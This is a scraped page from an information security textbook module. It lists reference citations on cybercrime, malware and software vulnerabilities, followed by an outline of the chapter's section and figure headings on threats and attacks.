anthony-digati-arrested-allegedly-threatening-new-york-life-email-spam-attack-article-1.173739.
32. Wlasuk, Alan. “Cyber-Extortion—Huge Profits, Low Risk.” Security Week. July 13, 2012. Accessed
August 10, 2020, from www.securityweek.com/cyber-extortion-huge-profits-low-risk.
33. Leger, Donna Leinwand, and Johnson, Kevin. “Federal Agents Knock Down Zeus Botnet, Cryp-
toLocker.” USA Today. June 2, 2014. Accessed August 11, 2020, from www.usatoday.com/story/news/
nation/2014/06/02/global-cyber-fraud/9863977/.
34. Fruhlinger, Josh. “What Is WannaCry Ransomware, How Does It Infect, and Who Was Responsible?” CSO
Online. August 30, 2018. Accessed August 10, 2020, from www.csoonline.com/article/3227906/what-is-wann-
acry-ransomware-how-does-it-infect-and-who-was-responsible.html.
35. FBI Internet Crime Complaint Center. “2019 Internet Crime Report.” Accessed August 11, 2020, from
https://pdf.ic3.gov/2019_IC3Report.pdf.
36. Bridis, Ted. “British Authorities Arrest Hacker Wanted as Fluffi Bunni.” April 29, 2003. Accessed August 10,
2020, from www.securityfocus.com/news/4320.
37. Costello, Sam. “Attrition.org Stops Mirroring Web Site Defacements.” ComputerWorld Online. May 22,
2001. Accessed August 10, 2020, from www.computerworld.com/article/2582627/attrition-org-stops-mirror-
ing-web-site-defacements.html.
38. Infoshop News. “Fighting the Fascists Using Direct Action Hacktivism.” March 28, 2010. Accessed May 24,
2016, from www.anarchistnews.org/content/fighting-fascists-using-direct-action-hacktivism.
39. Denning, Dorothy E. “Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing For-
eign Policy.” Info War Online. February 4, 2000. Accessed August 10, 2020, from www.iwar.org.uk/cyberter-
ror/resources/denning.htm.
40. Elmusharaf, M. “Cyber Terrorism: The New Kind of Terrorism.” Computer Crime Research Cen-
ter Online. April 8, 2004. Accessed August 10, 2020, from www.crime-research.org/articles/
Cyber_Terrorism_new_kind_Terrorism.
41. Lemos, R. “Assault on Net Servers Fails.” C|Net News.com. October 22, 2002. Accessed August 10, 2020,
from www.cnet.com/news/assault-on-net-servers-fails/.
42. Messmer, Ellen. “U.S. Cyber Counterattack: Bomb ’Em One Way or the Other.” February 8, 2007. Accessed
August 10, 2020, from www.networkworld.com/article/2294945/u-s--cyber-counterattack--bomb--em-one-way-
or-the-other.html.
43. Perlroth, Nicole, and Sanger, David. “Cyberattacks Seem Meant to Destroy, Not Just Disrupt.” March 28,
2013. Accessed August 11, 2020, from www.nytimes.com/2013/03/29/technology/corporate-cyberattackers-
possibly-state-backed-now-seek-to-destroy-data.html.
44. Ibid.
45. Redwine, Samuel T., Jr. (Editor). Software Assurance: A Guide to the Common Body of Knowledge to Produce,
Acquire, and Sustain Secure Software. Version 1.1. U.S. Department of Homeland Security. September 2006.
46. Ibid.
47. Strickland, Jonathon. “10 Worst Computer Viruses of All Time.” How Stuff Works. Accessed August 11,
2020, from http://computer.howstuffworks.com/worst-computer-viruses2.htm#page=1.
48. Rochford, Louisa. “The Worst Computer Viruses in History.” CEO Today. Accessed August 11, 2020, from
www.ceotodaymagazine.com/2019/06/the-worst-computer-viruses-in-history.
49. Weinberger, Sharon. “Top Ten Most-Destructive Computer Viruses.” Smithsonian. Accessed August 11,
2020, from www.smithsonianmag.com/science-nature/top-ten-most-destructive-computer-viruses-159542266.
50. U.S. Department of Justice Press Release. “Creator of Melissa Computer Virus Sentenced to 20 Months
in Federal Prison.” Accessed August 11, 2020, from www.justice.gov/archive/criminal/cybercrime/press-
releases/2002/melissaSent.htm.
51. Kehoe, Brendan P. Zen and the Art of the Internet, 1st Edition. January 1992. Accessed August 11, 2020,
from https://legacy.cs.indiana.edu/docproject/zen/zen-1.0_10.html#SEC91.
52. TruSecure. “TruSecure Successfully Defends Customers Against Goner Virus.” TruSecure Online. Decem-
ber 18, 2001. Accessed May 24, 2016, from www.thefreelibrary.com/TruSecure+Successfully+Defends+Custom
ers+Against+Goner+Virus.-a080877835.
53. McCarthy, Jack. “Blaster Worm Author Gets Jail Time.” InfoWorld. January 28, 2005. Accessed August 11,
2020, from www.infoworld.com/t/business/blaster-worm-author-gets-jail-time-441.
54. Jones, Les. “GoodTimes Virus Hoax Frequently Asked Questions.” December 12, 1998. Accessed August
11, 2020, from http://fgouget.free.fr/goodtimes/goodtimes.html.
55. SANS Institute. “Glossary of Security Terms.” SANS Institute Online. Accessed August 11, 2020, from www.
sans.org/security-resources/glossary-of-terms/.
56. SANS Institute. “Consensus Roadmap for Defeating Distributed Denial of Service Attacks: A Project of
the Partnership for Critical Infrastructure Security.” SANS Institute Online. February 23, 2000. Accessed
August 11, 2020, from www.sans.org/dosstep/roadmap.
57. Trend Micro. WORM_MYDOOM.A. Accessed May 24, 2016, from www.trendmicro.com/vinfo/us/
threat-encyclopedia/archive/malware/worm_mydoom.a.
58. Richtel, Matt. “Canada Arrests 15-Year-Old In Web Attack.” The New York Times. April 20, 2000.
59. “How CloudNine Wound Up in Hell.” Wired Online. February 1, 2002. Accessed August 11, 2020, from www.
wired.com/2002/02/how-cloudnine-wound-up-in-hell/.
60. Korolov, M. “Last Week’s DDoS Against the BBC May Have Been the Largest in History.” CSO Online.
Accessed August 11, 2020, from www.csoonline.com/article/3020292/cyber-attacks-espionage/ddos-attack-
on-bbc-may-have-been-biggest-in-history.html.
61. O’Brien, Sara Ashley. “Widespread Cyberattack Takes Down Sites Worldwide.” CNN Business. October 21,
2016. Accessed August 11, 2020, from https://money.cnn.com/2016/10/21/technology/ddos-attack-popular-
sites/index.html.
62. Pearce, James. “Security Expert Warns of MP3 Danger.” ZDNet News Online. March 18, 2002. Accessed
August 12, 2020, from www.zdnet.com/article/security-expert-warns-of-mp3-danger/.
63. “Murphy’s Laws Site.” Accessed August 12, 2020, from www.murphys-laws.com/.
64. Wolfe, Alexander. “Intel Preps Plan to Bust Bugs in Pentium MPUs.” Electronic Engineering Times, no. 960
(June 1997): 1.
65. Taylor, Roger. “Intel to Launch New Chip Despite Bug Reports.” Financial Times (London), no. 25 (June
1998): 52.
66. OWASP. “Top 10 Web Application Security Risks.” Accessed August 12, 2020, from https://owasp.org/
www-project-top-ten/.
67. Howard, M., LeBlanc, D., and Viega, J. 24 Deadly Sins of Software Security: Programming Flaws and How to
Fix Them. 2010. New York: McGraw-Hill/Osborne.
68. Spanbauer, Scott. “Pentium Bug, Meet the IE 4.0 Flaw.” PC World 16, no. 2 (February 1998): 55.
69. Brumley, D., Tzi-cker, C., Johnson, R., Lin, H., and Song, D. “RICH: Automatically Protecting Against Integer-
Based Vulnerabilities.” Accessed August 12, 2020, from https://sites.cs.ucsb.edu/~rachel.lin/papers/Rich.
pdf.
70. Howard, M., LeBlanc, D., and Viega, J. 24 Deadly Sins of Software Security: Programming Flaws and How to
Fix Them. 2010. New York: McGraw-Hill/Osborne.

Principles of Information Security 7E - Module 2

Uploaded by

Copyright:

Available Formats

Principles of Information Security 7E - Module 2

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Principles of Information Security 7E - Module 2

Uploaded by

Copyright:

Available Formats

MODULE 2

The Need for Information

“Sounds like it is going to be complicated … and expensive,” said Fred.

Introduction To The Need For Information Security

Business Needs First

Protecting Data That Organizations Collect and Use

Enabling the Safe Operation of Applications

Safeguarding Technology Assets in Organizations

Information Security Threats And Attacks

4.8 Billion Potential Hackers

Table 2-1 World Internet Usage3

Population Population Internet Users Penetration Growth Internet

Other Studies of Threats

Common Attack Pattern Enumeration and Classification

The 12 Categories Of Threats

Compromises to Intellectual Property

software piracy Software Piracy

Table 2-5 The 12 Categories of Threats to Information Security8

Category of Threat Attack Examples

Source: Business Software Alliance. Used with permission.

Figure 2-1 BSA’s software piracy reporting Web site

Copyright Protection and User Registration

Source: Microsoft. Used with permission.

Source: Steam Online. Used with permission.

Figure 2-3 Steam subscriber agreement and product registration

Violating Software Licenses

Deviations in Quality of Service

Internet Service Issues

What are the top causes of downtime?

Figure 2-4 Average cost of downtime according to Fusion Connect12

Communications and Other Service Provider Issues

Espionage or Trespass competitive

Some forms of espionage are relatively low-tech. One

shoulder surfing Hackers

Scars and Marks:

Figure 2-6 Contemporary hacker profile

HACK PCWEEK TOPOLOGY

DB2 DB2 Linux Windows

Figure 2-7 Hack PCWeek topology

Notorious Outlaws: Mitnick and Snowden

Table 2-6 Password Strength

Social Engineering Password Attacks

Landslides, Mudslides, and Avalanches

Tornados and Severe Windstorms

Hurricanes, Typhoons, and Tropical Depressions

Human Error or Failure

Figure 2-8 The biggest threat—acts of human error or failure

Figure 2-9 Example of a Nigerian 4-1-9 fraud letter

Figure 2-10 Phishing example: lure

Figure 2-11 Phishing example: fake Web site

Source: Internal Revenue Service (IRS).

For a list of prominent ransomware investigations and arrests, visit www.technology.org/2016/11/21/

Figure 2-13 Ransomware notification screen

Cyberterrorism and Cyberwarfare

Figure 2-14 Cyberactivists wanted

Positive Online Activism

Table 2-7 The Most Dangerous Malware Attacks to Date47,48,49

Table 2-8 Attack Replication Vectors

Robert Morris and the Internet Worm51